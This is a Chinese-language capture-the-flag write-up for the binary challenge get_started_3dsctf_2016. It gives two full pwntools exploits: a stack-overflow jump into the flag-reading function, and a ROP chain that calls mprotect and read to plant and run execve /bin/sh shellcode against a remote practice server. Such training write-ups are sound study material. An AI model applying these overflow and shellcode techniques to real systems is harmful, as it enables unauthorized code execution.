get_started_3dsctf_2016
题外:这道题不是很难,但是却难住了我很久。主要是在IDA中查看反编译出的伪代码时双击了一下gets()函数,结果进入gets函数内部,我当时就懵了,误以为这是一个自定义函数,但是自定义函数应该应该不能与已有的库函数同名啊。虽然有此疑问,我没有深究,而是老老实实分析反汇编出来的伪代码,结果发现函数层层嵌套,根本分析不完。最后我不得以去网上看了别人的题解,发现根本不用管这些。题最后做出来了,但还是不明白为啥会有这么一大串代码。
----------------------------------------------------------------------------------------------------
解法一:
先分析题目的二进制文件
可以看出这是32位程序,没有看cannary和PIE保护,接下来把程序放入IDA中看看。
程序很简单,存在明显的栈溢出。细心的小伙伴还可以发现程序直接给了一个拿flag的函数,如下:
但是这个函数中有if条件限制,不好直接跳转到这个函数。这个时候就可以选择直接跳转到if语句块里,从而绕过if的检查。这么的做的弊端是导致栈不平衡,执行完这个函数后程序会崩溃,不过这之前我们已经拿到flag了,所以这题是没有什么关系的。最后exp如下:
from pwn import * context.terminal = ['tmux', 'splitw', '-h'] context.log_level = 'debug' elf = ELF('./get_started_3dsctf_2016') sh = elf.process() get_flag = 0x080489b8 payload_01 = 'A'*0x38 + p32(get_flag) gdb.attach(sh) sh.sendline(payload_01) sh.interactive('countfatcode> ')
这样写在本机上是能跑的,但是打远程的时候汇出错,我也不知道为什么。
解法二:
细心的小伙伴可以发现题目里有mprotect函数,这个函数可以改变程序内存空间的读写执行权限。具体的用法如下:
int mprotect(const void *start, size_t len, int prot); 参数start表示开始的内存地址,len是要操作的内存大小,prot表示权限
所以我们先用mrotect函数把.bss中的一部分改为可执行,用调用read函数向其中写入shellcode,最后再跳转到shellcode出执行。具体的exp如下:
from pwn import * context(os = 'linux', arch = 'i386', log_level = 'debug') context.terminal = ['tmux', 'splitw', '-h'] # p = process('./get_started_3dsctf_2016') p = remote('node3.buuoj.cn', 25626) elf = ELF('./get_started_3dsctf_2016') mprotect_addr = 0x0806ec80 read_addr = elf.symbols['read'] pop3_addr = 0x080509a5 payload = 'A'*0x38 + p32(mprotect_addr) + p32(pop3_addr) + p32(0x080ea000) + p32(0x2000) + p32(0x7) + p32(read_addr) + p32(0x080eb000) payload += p32(0) + p32(0x080eb000) + p32(0x100) #gdb.attach(p) p.sendline(payload) sleep(1) shellcode = asm(''' mov edx, 0 mov ecx, 0 push 0x68732f push 0x6e69622f mov ebx, esp mov eax, 0xb int 0x80 ''') p.sendline(shellcode) p.interactive()